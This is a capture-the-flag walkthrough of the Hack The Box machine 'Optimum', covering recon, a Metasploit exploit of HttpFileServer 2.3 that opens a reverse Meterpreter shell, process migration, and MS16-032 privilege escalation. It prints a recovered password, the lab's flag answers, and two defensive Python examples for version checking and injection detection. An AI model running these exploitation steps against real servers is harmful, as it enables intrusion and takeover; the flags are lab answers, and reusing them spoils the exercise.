# Optimum

## TARGET IP: 10.10.10.8

## HOST IP: 10.10.16.10

## Recon

### NMAP

```
nmap [Target IP]
```

<figure><img src="/files/8GXUG9NDuoyIT7r4zWgD" alt=""><figcaption></figcaption></figure>

```
nmap [Target IP] -A -p 80
```

<figure><img src="/files/93tVF3cy7ISFozUKdHWU" alt=""><figcaption></figcaption></figure>

### HTTP

<figure><img src="/files/iZiaa3Lu8FZr3Dx4qXvs" alt=""><figcaption></figcaption></figure>

* Nothing on page source that I could find.
* It is using [HttpFileServer 2.3](/htb/machines/easy-machines/stocker.md)
  * Their latest version is 2.3m

<figure><img src="/files/eaqVCYISaugENImmWXep" alt=""><figcaption></figcaption></figure>

* The login button opens a login prompt.

<figure><img src="/files/hHXXdMmuoqg1aUvlp6ZC" alt=""><figcaption></figcaption></figure>

* Let's take a crack at logging in with the credentials `admin:admin`.

<figure><img src="/files/n7yr8oVJM0LIh8DqoHOR" alt=""><figcaption></figcaption></figure>

* Discovered a new directory, `/~login`, which has a tilde in front.

![](/files/CTFzIGSfLwQWndWPpDSt)

### Vulnerable Software

* HFS 2.3 is old and filled with goodies.
* Lots of vulnerabilities are mentioned on their own website:

![](/files/aPiceJvvaCcVKHvM6hZh)

* Exploit DB has two verified exploits [1](https://www.exploit-db.com/exploits/34668) & [2](https://www.exploit-db.com/exploits/39161).

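The version gap noted above (HFS 2.3 running, 2.3m current) is the kind of thing an inventory check can flag on its own. This is an added example, not code from the original write-up; it assumes HFS announces itself in the HTTP `Server` header as `HFS <version>`, and the sample response is constructed.

```python
import re

# Latest HFS release named in the write-up; anything older is behind.
LATEST_HFS = "2.3m"

# Assumed banner format: "HFS 2.3", "HFS 2.3m", ... (major.minor plus optional letter).
_VERSION_RE = re.compile(r"^HFS\s+(\d+)\.(\d+)([a-z]?)\b", re.IGNORECASE)


def parse_hfs_version(server_header):
    """Turn 'HFS 2.3m' into a comparable tuple (2, 3, 13); plain '2.3' becomes (2, 3, 0).
    Returns None when the header does not look like an HFS banner."""
    m = _VERSION_RE.match(server_header.strip())
    if not m:
        return None
    major, minor, letter = m.groups()
    # HFS point releases are lettered (2.3a .. 2.3m); no letter sorts before 'a'.
    patch = ord(letter.lower()) - ord("a") + 1 if letter else 0
    return (int(major), int(minor), patch)


def server_header_from_response(raw_response):
    """Pull the Server header value out of a raw HTTP response."""
    for line in raw_response.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


def assess(raw_response, latest=LATEST_HFS):
    """Return (is_hfs, behind_latest, server_header) for a captured response."""
    header = server_header_from_response(raw_response)
    if header is None:
        return (False, False, None)
    found = parse_hfs_version(header)
    if found is None:
        return (False, False, header)
    return (True, found < parse_hfs_version("HFS " + latest), header)


# Constructed sample response mimicking the banner seen on the box (format assumed).
SAMPLE_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nServer: HFS 2.3\r\n\r\n<html>"

if __name__ == "__main__":
    print(assess(SAMPLE_RESPONSE))
```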
## Enumeration

### Gobuster

```
gobuster dir -u http://[Target IP] -w /usr/share/dirb/wordlists/common.txt 
```

<figure><img src="/files/ZJzEdd4WLDmnJn6Yyi8n" alt=""><figcaption></figcaption></figure>

* Try putting a \~ at the end since we saw that the `/~login` directory had it.

```
gobuster dir -u http://[Target IP]/~ -w /usr/share/dirb/wordlists/common.txt 
```

### WinPEASx64

* Credentials for kostas

![](/files/yXhNqzOV1GFUtAiFfHlL)

```
kdeEjDowkS*
```

* I need to be better at looking through these to see if I could've found more information.

### Browsing

* Run the typical commands from the [hacktricks checklist](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation) to see some information on the system.

```
sysinfo
```

* This will tell us the system is Windows Server 2012 R2.
* This is a 64-bit system.

## Exploit

### Metasploit

* Let's check out Metasploit

```
msfconsole
search hfs
```

![](/files/cWd6oW88R5MeWfuS0yhh)

```
use 1
show options
```

![](/files/g4VLorRwSAYFvNuePGPd)

```
set rhosts [Target IP]
set lhost [Host IP]
check 
exploit
```

![](/files/BYGXJfSNjcEkOdnUO6Il)

* Now we have a Meterpreter session.

```
shell
whoami
```

![](/files/Oo5Vjqzo5AOGZAGJjh3J)

```
type C:\Users\kostas\Desktop\user.txt
```

* User Flag

```
b9058357319a5b76f10e01253a382c67
```

* The next step is to use Metasploit to gain root privileges. I tried browsing the system for a while but didn't find anything useful. The tool I need is a kernel exploit.
* When we ran the `sysinfo` command we found the system is a Windows 2012 R2 server, which is a 64-bit architecture. The `reverse_tcp_shell` that we are using as our payload is a 32-bit process. We should `migrate` over to a different process that is 64-bit.
* In the Meterpreter session, run the following.

```
ps
```

![](/files/SEhE0HTsUvvAktWwUexL)

* We see that the `explorer.exe` process is running on `PID 660`.
* Let's `migrate` over to this process.

```
migrate [PID for explorer.exe]
```

![](/files/vY0VEkQKd6hvCatUL8Ac)

![](/files/sCcSjoIA07Jto9I39vTI)
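From the defender's side, the migration step above (a thread injected into `explorer.exe` from the web-server process) is what a Sysmon CreateRemoteThread rule (Event ID 8) is meant to catch. This is an added example, not part of the original write-up; the log lines are constructed, the key=value layout, the `hfs.exe` path and the allowlist of legitimate source images are assumptions for illustration.

```python
import re

# key=value pairs, with quoted values allowed (constructed log layout, not Sysmon's XML).
_FIELD_RE = re.compile(r"(\w+)=(\"[^\"]*\"|\S+)")


def parse_event(line):
    """Parse one constructed key=value Sysmon line into a dict; None if no EventID."""
    fields = {k: v.strip('"') for k, v in _FIELD_RE.findall(line)}
    try:
        fields["EventID"] = int(fields["EventID"])
    except (KeyError, ValueError):
        return None
    return fields


def is_suspicious_migration(event, allowed_sources=()):
    """True when a remote thread is created inside explorer.exe by a process that is
    not on the allowlist. explorer.exe is the 64-bit host the write-up migrated into;
    anything starting a thread in it that is not a known Windows component deserves a look."""
    if not event or event.get("EventID") != 8:
        return False
    target = event.get("TargetImage", "").lower()
    source = event.get("SourceImage", "").lower()
    if not target.endswith("\\explorer.exe"):
        return False
    return source not in {s.lower() for s in allowed_sources}


def scan(lines, allowed_sources=()):
    """Return (SourceImage, TargetImage, TargetProcessId) for every event worth alerting on."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_suspicious_migration(ev, allowed_sources):
            hits.append((ev["SourceImage"], ev["TargetImage"], ev.get("TargetProcessId")))
    return hits


# Constructed sample log; the hfs.exe path is assumed, PID 660 matches the ps output above.
SAMPLE_LOG = [
    'EventID=1 Image="C:\\Windows\\explorer.exe" ProcessId=660',
    'EventID=8 SourceImage="C:\\Users\\kostas\\Desktop\\hfs.exe" SourceProcessId=2132 '
    'TargetImage="C:\\Windows\\explorer.exe" TargetProcessId=660 StartFunction=-',
    'EventID=8 SourceImage="C:\\Windows\\System32\\csrss.exe" SourceProcessId=404 '
    'TargetImage="C:\\Windows\\explorer.exe" TargetProcessId=660 StartFunction=-',
    'EventID=8 SourceImage="C:\\Windows\\System32\\svchost.exe" SourceProcessId=800 '
    'TargetImage="C:\\Windows\\System32\\notepad.exe" TargetProcessId=1200 StartFunction=-',
]
ALLOWED = ("C:\\Windows\\System32\\csrss.exe",)  # illustrative allowlist entry

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, ALLOWED):
        print("ALERT remote thread into explorer.exe:", hit)
```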

* Next, let's `background` the current Meterpreter session.

```
bg
```

![](/files/8gkGepxMU014nkAPKMys)

* We can confirm this has been backgrounded:

```
sessions
```

![](/files/v2uhGhuE3IOLNfoH2HAS)

* Since we now have access to the Windows system, let's see if we can find a Metasploit local exploit to gain root privileges.

```
search exploit/windows/local
```

![](/files/5Eg4NbXiXPHyM9tfavtQ)

* I had to get a hint here and use a Microsoft vulnerability in the system [MS16\_032](https://learn.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032).

```
use 33
```

![](/files/GtikN64RvI6AZ7Cb1ZsT)

* I'm not sure if winPEASx64 showed this somewhere, but I could have also used a tool called [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester). Here is a [write-up](https://alamot.github.io/optimum_writeup/) on how to use it. It's a bit complicated, as you run it on your host system by exporting the target system info.
* After selecting our exploit in Metasploit we will then set it up and run it.

```
show options
set session 1
set lhost [Host IP]
```

![](/files/q3c3XdbeVQTXRXhWp55u)

```
exploit
```

![](/files/HGA23KhRI26tavLozyJC)

* We now have a shell to the system as administrator.

```
shell
type C:\Users\Administrator\Desktop\root.txt
```

![](/files/NDAyYekJbYlo9EpQyBlz)

```
64869e78042316656ffc989ba52d5d2b
```

## Conclusion

* I knew going into this lab that I could use Metasploit. I didn't know when I would get to use it but knew it was an option. I wanted to try to get access to the system without Metasploit but I don't think my level of skill is high enough to do it, let alone understand it.
* I need to work on my enumeration skills with Windows systems. I have a far better understanding of them with Linux and could probably spend some more time with Windows.
* It was a good lab but I'd really like to finish one of these without help one day.
